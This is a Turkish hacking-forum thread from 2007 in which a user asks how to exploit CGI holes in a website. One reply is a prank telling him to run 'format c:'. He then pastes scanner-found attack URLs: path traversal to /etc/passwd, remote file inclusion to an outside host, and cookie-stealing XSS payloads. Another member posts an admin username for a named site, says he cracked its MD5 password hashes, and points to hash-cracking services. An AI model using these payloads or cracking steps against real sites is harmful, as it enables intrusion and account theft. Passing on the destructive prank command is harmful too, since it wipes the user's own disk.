Bi Soru ?

Tahribat.com Forumları
line

Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
line

Bi Soru ?

20/Tem/07 14:33 Kısayol Şikayet Özel Mesaj

Sass

Kayıt Tarihi: 11/Temmuz/2007

Merhaba arkadaslar Cgi acigini nasil kullana bilirim ? Ne tur bir yol izlemeliyim yardimci olurmusunuz ? Tesekkurler.

Alıntı yap
20/Tem/07 14:55 Kısayol Şikayet Özel Mesaj

yolbulucu

Banlanmış Üye

Kayıt Tarihi: 06/Nisan/2007

bak simdi bi disket bul tak pcye bilgisayarımda diskete sağ tıkla bicimlendir de baslangıc diketi olusturu sec. bicimlesin sonra pcyi kapa disketten ac.
format c: yaz
cıkan herseye e vet evet de.
format bitinde scan rfi from cgi yaz
site adı sorcak sitenin adını yaz tamamdır :)
bunu yap sonra sana biosa sql inj. cekmeyi öğretcem

29.99cm, titanyum kaplamalı, çift damarlı, su ve yağ soğutmalı.

Alıntı yap
20/Tem/07 15:06 Kısayol Şikayet Özel Mesaj

Sass

Kayıt Tarihi: 11/Temmuz/2007

Aga disket yok :D Neyapicagiz simdi zaten Firariyim yurt disinda disarida cikamam :P Dil yok bisey yok bunun baska yontemi yokmu ?

Alıntı yap
20/Tem/07 17:59 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

Adam xx forum hack diye birşey sormamış dalga geçilcek birşey değil yani.
http://www.tahribat.com/forumdisplayfolder.asp?highlight=CGI&folderid=43080
Burda CGI Scanner var bununla sitenin CGI açıklarını taratabilirsin ya da kendin teker teker elle denersin :)

Alıntı yap
20/Tem/07 18:36 Kısayol Şikayet Özel Mesaj

Sass

Kayıt Tarihi: 11/Temmuz/2007

AntiOksidan abim zaten tarayip bulmustum ya ama nasil yontem kulanicam onu sordum :))

Mesela Risk seviyesi orta olanlardan bir kac tanesini belirtiyim ;
/index.php?page=../../../../../../../../../../etc/passwd
index.php?page=http://www.nstalker.com/file
index.php?picture_n=image.gif&gallery_name=non-existant-path
index.php?pymembs=admin
index.php?sql_debug=1
alert(document.cookie)/index.php?topic=
webmail/src/addressbook.php
webmail/src/addressbook.php?"%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3c!--
webmail/src/compose.php
webmail/src/help.php
webmail/src/help.php?chapter=%3cscript%3ealert('boop!')%3c/script%3e
webmail/src/options.php
webmail/src/options.php?optpage=%3cscript%3ealert('boop!')%3c/script%3e
webmail/src/read_body.php
webmail/src/search.php
/webmail/src/search.php?mailbox=%3cscript%3ealert('boop!')%3c/script%3e&what=x&where=BODY&submit=Search
Buda Yuksek Seviye Bir Aci ;
test.php
Kulandigim Program N-Stealth En iyileri arasinda olan bir pro cogunuz tanirsiniz sanirim bu aciklari uldum ama nasiL bir yontem izliyecegimi bilmiyorum bilgisi olan yardimci olursa sevinirim saygilar.

Alıntı yap
20/Tem/07 18:42 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

Hoca uğraşma webhack.com un şifrelerinin md5li hallerini senin için söktüdüm : P al webhack.com admin id ve pass : )
username:ashcraft
Abi n-stealth kullanmadım da onları urlye ekliceksin.ama ben kontrol ettim senin için yok bişey çıkmıyo :)
edit:İstek üzerine "pass" silinmiştir.

Alıntı yap
20/Tem/07 18:46 Kısayol Şikayet Özel Mesaj

Sass

Kayıt Tarihi: 11/Temmuz/2007

Saol Pasam :D Ama Pm olarak atsayin keske milet usumeseydi benim icin iyi bir denemeo lucak -:D Kulanici adi neydi :D Bide han proyuulandiniz kirmak icin hocam ?
Okadar denedim kiramadim ben :D

Alıntı yap
20/Tem/07 18:56 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

http://xmd5.com/ burdan ya da http://www.services.tahribat.com daki md5 hash çözme yerinden dene,
hashi sildim user name ise : ashcraft. sitelerde işe yaramazsa md5i çözmek için tahribat.com dosya arşivinden md5 kırıcıyı indir ama çözmesi uzun mu sürer kısa mı bilmiyorum.

Alıntı yap
20/Tem/07 19:18 Kısayol Şikayet Özel Mesaj

Sass

Kayıt Tarihi: 11/Temmuz/2007

Ilgil alakali arkadaslara milyonlarca kez tesekkurle ama loging hatali sanirim giris yapamyorum :))) delircem :( AntiOksidan Abem bilhgileri kontuurol edip pm olarak ozel msj halinde yolarmisin vala giremedim

Alıntı yap

Toplam Hit: 1755 Toplam Mesaj: 9

Cevapla